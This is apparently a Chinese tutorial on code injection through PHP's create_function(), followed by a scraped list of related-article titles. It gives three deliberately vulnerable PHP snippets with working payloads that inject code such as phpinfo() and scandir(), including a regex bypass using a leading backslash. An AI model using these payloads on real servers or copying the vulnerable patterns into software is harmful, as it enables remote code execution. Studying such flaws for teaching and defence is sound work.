php 命名空间 create_function,PHP create_function()注入命令执行漏洞
0x00 create_function()介绍
create_function()创建匿名函数
string create_function ( string $args , string $code )
string
code 方法代码部分
举例:
create_function('$name','echo $name."A"')
类似于:
function name($name) {
echo $name."A";
}
0x01 漏洞利用
1
//02-8.php?id=2;}phpinfo();/*
$id=$_GET['id'];
$str2='echo '.$a.'test'.$id.";";
echo $str2;
echo "
";
echo "==============================";
echo "
";
$f1 = create_function('$a',$str2);
echo "
";
echo "==============================";
?>
payload:
http://localhost/libtest/02-8.php?id=2;}phpinfo();/*
原理:
id=2;}phpinfo();/*
执行函数为:
源代码:
function fT($a) {
echo "test".$a;
}
注入后代码:
function fT($a) {
echo "test";}
phpinfo();/*;//此处为注入代码。
}
2
//how to exp this code
$sort_by=$_GET['sort_by'];
$sorter='strnatcasecmp';
$databases=array('test','test');
$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';
usort($databases, create_function('$a, $b', $sort_function));
?>
payload:
func.php?sort_by="]);}phpinfo();/*
3
error_reporting(0);
if(isset($_GET['action'])){
$action=$_GET['action'];
}
if(isset($_GET['action'])){
$arg=$_GET['arg'];
}
if(preg_match('/^[a-z0-9_]*$/isD',$action)){
show_sourse(_FILE_);
}else{
$action($arg,'');
}
?>
正则绕过,数字字母下划线都被禁止.
思路就是在开头或结尾插入字符绕过检测,涉及到php全局命名空间:在函数的头部加上 \就是调用全局的此函数,即\create_function()就是调用全局的create_function()函数,同时函数头部加上\可绕过正则过滤,\即%5c.
漏洞利用处
arg,'');,也就是说如果利用create_function()函数漏洞,这里是参数为GET值,执行代码为空
payload:
ip/?action=%5ccreate_function&arg=){}var_dump(scandir("./"));/*
php 命名空间 create_function,PHP create_function()注入命令执行漏洞相关推荐
- 【Web安全】DVWA之Command injection(命令执行漏洞)探索
文章目录 1 命令行注入 2 low 3 Medium 4 Middle 5 Impossible 1 命令行注入 命令执行漏洞的原理:在操作系统中, & .&& .| . | ...
- php post 漏洞_文件包含上传漏洞目录遍历命令执行漏洞
制丨阿星 来源丨freebuff 作者丨Deutsh 文件上传漏洞: 一句话木马 一句话木马主要由两部分组成:执行函数与 接收被执行代码的变量 执行函数: eval() assert() create ...
- PHP代码/命令执行漏洞总结
目录 0x00 代码执行相关函数 1.mixed eval(string code_str) 2.bool assert ( mixed $assertion [, string $descripti ...
- 第30天-WEB 漏洞-RCE 代码及命令执行漏洞全解
在 Web 应用中有时候程序员为了考虑灵活性.简洁性,会在代码调用代码或命令执行函数去处理.比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞.同样 ...
- struts2漏洞_十大常见web漏洞——命令执行漏洞
命令执行漏洞在不同框架下都有存在,也是十分普遍且危害极大,下面我们介绍一个最具代表性的,也是影响范围最大的一个命令执行漏洞--Struts2远程代码执行漏洞. Struts2 漏洞介绍 ApacheS ...
- SpringMessaging命令执行漏洞 cve-2018-1270
漏洞概述 https://pivotal.io/security/cve-2018-1270 STOMP(Simple Text Orientated Messaging Protocol)全称为简单 ...
- 【安全漏洞】Rocket.Chat 远程命令执行漏洞分析
简述 Rocket.Chat 是一个开源的完全可定制的通信平台,由 Javascript 开发,适用于具有高标准数据保护的组织. 2021年3月19日,该漏洞在 HackerOne 被提出,于2021 ...
- 命令执行——命令执行漏洞概述(一)
普及内容 了解命令执行定义 了解命令执行条件 掌握命令执行成因 了解命令执行危害 掌握命令执行实例 掌握管道符号和通用命令符 了解命令执行常见场景 基础概念 命令执行定义 基本定义 命令执行漏洞是指攻 ...
- 漏洞payload 靶机_学生会私房菜【20200707期】Wordpress 4.6 任意命令执行漏洞
学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:<Wordpress 4.6 任意命令执行漏洞> 作者介绍:AT ...
最新文章
- 分布式系统性能监控工具,初探Pinpoint Agent启动源码
- 2017年10月31日结束Outlook 2007与Office 365的连接
- 关于Jsoup解析https网页的问题
- 辗转相除法的程序实现
- php fsockopen socket,PHP利用socket(fsockopen)的简单示例
- ruby中的回调方法和钩子方法
- 3.13 判读是否是对称素数
- Spring 框架 DAO 与 事务 的总结
- dns日志级别 linux,linux下DNS服务器视图view及日志系统详解
- js中的charAt,indexOf
- aws rds监控慢sql_估算AWS RDS SQL Server成本
- 优客365 v2.9版本 后台存在SQL注入
- AWK中BEGIN和END的使用理解
- C++PrimerPlus 第六章 分支语句和逻辑运算符 - 6.1 if语句
- 冰点还原容易出现的问题总结
- 自变量与因变量相关分析不显著能做回归分析吗?
- netbeans java中文_netbeans中文乱码解决方案
- 淘宝粉丝能买吗?怎么加最快
- c语言str相关的函数
- roc曲线spss怎么做_SPSS单因素ROC曲线及多因素联合诊断ROC曲线绘制(原创手把手) - 医学统计和生物统计讨论版 -丁香园论坛...
热门文章
- 服务器手工修改虚拟内存,服务器修改虚拟内存
- 解决Ubuntu,su: 认证失败
- python的烦恼_还在为每天忘记签到而烦恼吗?python来帮你搞定!
- Python教程:json中encode与decode区别
- python中的set函数、列表的操作
- 用Python求出:1到某个数的奇数序列里一共出现了多少个3
- Python 中,字符串连接效率最高的方式是?一定出乎你的意料
- 使用python进行面部合成,比PS好用多了
- java 判断 中文字符_java中判断字符串中是否有中文字符
- java 增量,Java增量运算符查询(++ i和i ++)